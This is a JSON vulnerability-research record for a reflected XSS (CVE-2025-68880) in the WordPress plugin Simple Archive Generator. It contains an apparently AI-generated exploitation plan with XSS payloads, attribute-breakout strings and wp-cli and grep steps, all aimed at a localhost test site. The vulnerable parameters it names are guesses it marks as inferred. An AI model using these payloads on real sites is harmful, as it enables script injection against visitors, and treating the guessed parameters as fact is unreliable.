[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcr84UeDLtUBYFP7EYWCCYetY2VkZwE9K3ZCrb9OQDZY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2025-68880","simple-archive-generator-reflected-cross-site-scripting","Simple Archive Generator \u003C= 5.2 - Reflected Cross-Site Scripting","The Simple Archive Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","simple-archive-generator",null,"\u003C=5.2","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-27 00:00:00","2026-02-02 16:18:10",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5c4f381f-aa03-46f9-aa27-daac4eed58c8?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-68880 (Simple Archive Generator)\n\n## 1. Vulnerability Summary\nThe **Simple Archive Generator** plugin (versions \u003C= 5.2) is vulnerable to **Reflected Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin accepts user-controlled input via HTTP parameters and reflects that input back into the HTML response without proper sanitization (using functions like `sanitize_text_field`) or context-aware output escaping (using functions like `esc_html` or `esc_attr`). This allows an unauthenticated attacker to execute arbitrary JavaScript in the context of a user's browser session.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Any frontend page or post where the Simple Archive Generator shortcode is active, or a specific plugin-generated archive page.\n*   **Vulnerable Parameter:** Likely a GET parameter used for filtering or pagination, such as `sag_page`, `category`, `monthnum`, or a search\u002Ffilter parameter (inferred).\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. The attacker needs to trick a victim (e.g., an administrator) into clicking a crafted link.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers a shortcode (likely `[simple-archive-generator]`) or a template redirect hook to handle archive display.\n2.  **Input Processing:** Inside the shortcode callback or the archive rendering function, the plugin accesses global variables like `$_GET['parameter_name']`.\n3.  **Lack of Sanitization:** The code fails to sanitize this input.\n4.  **Reflection (The Sink):** The input is echoed directly into the page content or into an HTML attribute (e.g., `value=\"...\"` or `href=\"...\"`) to maintain the state of filters or pagination links.\n    *   *Example Vulnerable Pattern:* `echo '\u003Ca href=\"?paged=' . $_GET['paged'] . '\">Next\u003C\u002Fa>';`\n5.  **Execution:** The browser renders the malicious script tag or attribute breakout provided in the parameter.\n\n## 4. Nonce Acquisition Strategy\nReflected XSS via GET parameters typically **does not require a nonce**, as nonces in WordPress are primarily used for CSRF protection on state-changing actions (POST requests). \n\nHowever, if the reflection occurs within a script context where the plugin enqueues localized data, the following strategy should be used to check for related vulnerabilities:\n1.  **Identify Shortcode:** Search the plugin code for `add_shortcode`. \n    *   `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsimple-archive-generator\u002F`\n2.  **Create Test Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Archive Test\" --post_content='[simple-archive-generator]'` (Note: exact shortcode name to be verified by `grep`).\n3.  **Extract Localized Variables:**\n    *   Use `browser_navigate` to the created page.\n    *   Check for localized scripts: `browser_eval(\"window.sag_vars\")` or similar (inferred).\n\n## 5. Exploitation Strategy\n### Step 1: Identify the Reflection Point\nThe agent should first identify which parameter is reflected. Common candidates for an archive plugin:\n*   `paged`\n*   `sag_order`\n*   `cat`\n*   `month`\n\n### Step 2: Test for Reflection with a Canary\nPerform an HTTP GET request to a page containing the shortcode with a unique string.\n*   **Request:** `GET \u002Farchive-test-page\u002F?sag_test=HTB_CANARY`\n*   **Tool:** `http_request`\n*   **Check:** Verify if `HTB_CANARY` appears unescaped in the response body.\n\n### Step 3: Craft the XSS Payload\nOnce the reflected parameter is found, use a breakout payload.\n*   **If reflected in a text node:** `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n*   **If reflected in an attribute (e.g., value):** `\"onmouseover=\"alert(1)`\n\n### Step 4: Final Payload Execution\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Farchive-test-page\u002F?VULN_PARAM=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n*   **HTTP Method:** GET\n*   **Expected Header:** `Content-Type: text\u002Fhtml`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure Simple Archive Generator \u003C= 5.2 is installed and active.\n2.  **Create Content:** Create a few posts to ensure the archive generator has data to display.\n    *   `wp post generate --count=5`\n3.  **Place Shortcode:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Archive\" --post_content='[simple-archive-generator]'`\n    *   *Note:* The agent must verify the actual shortcode string in the source code first.\n\n## 7. Expected Results\n*   The HTTP response body must contain the literal, unescaped payload: `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   If using a browser-based PoC, a popup or log indicating the script executed in the `localhost:8080` context should appear.\n\n## 8. Verification Steps\n1.  **Search for Sinks:** Use grep to find unescaped echos of GET parameters in the plugin directory:\n    *   `grep -rP \"echo.*\\\\\\$_GET\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsimple-archive-generator\u002F | grep -v \"esc_\"`\n2.  **Manual Confirmation:** Run a `curl` command (from the agent's environment, pointing to the host) and pipe to `grep` to show the raw reflection:\n    *   `http_request \"http:\u002F\u002Flocalhost:8080\u002Farchive\u002F?param=\u003Cscript>\"`\n    *   Check response for: `...Results for \u003Cscript>...` (example).\n\n## 9. Alternative Approaches\nIf no simple GET reflection is found on the frontend:\n1.  **Search for Admin-Side Reflected XSS:** Check if the plugin has an admin settings page that reflects parameters (e.g., `?page=simple-archive-generator&message=\u003Cscript>`).\n    *   `grep -r \"add_menu_page\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsimple-archive-generator\u002F`\n2.  **AJAX Reflection:** Check if `wp_ajax_nopriv` handlers reflect any input.\n    *   `grep -r \"wp_ajax_nopriv\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsimple-archive-generator\u002F`\n3.  **Attribute Breakout:** If the input is reflected inside an HTML tag attribute, try:\n    *   `?param=x\" onfocus=\"alert(1)\" autofocus=\"`\n    *   `?param=javascript:alert(1)\u002F\u002F` (if reflected in an `href`).","The Simple Archive Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to 5.2. This is caused by the plugin reflecting un-sanitized user input from GET parameters (such as those used for pagination) directly into the HTML response.","The exploit targets unauthenticated users by tricking them into clicking a crafted URL that contains a malicious JavaScript payload in a reflected GET parameter. 1. Identify a page where the plugin's archive shortcode is active. 2. Append a malicious payload to common archive parameters such as 'paged', 'sag_order', or 'cat' (e.g., `?paged=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`). 3. When a victim views the crafted link, the plugin echoes the parameter value without escaping, allowing the script to execute in the victim's browser context.","gemini-3-flash-preview","2026-05-04 23:22:39","2026-05-04 23:22:57",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-archive-generator\u002Ftags"]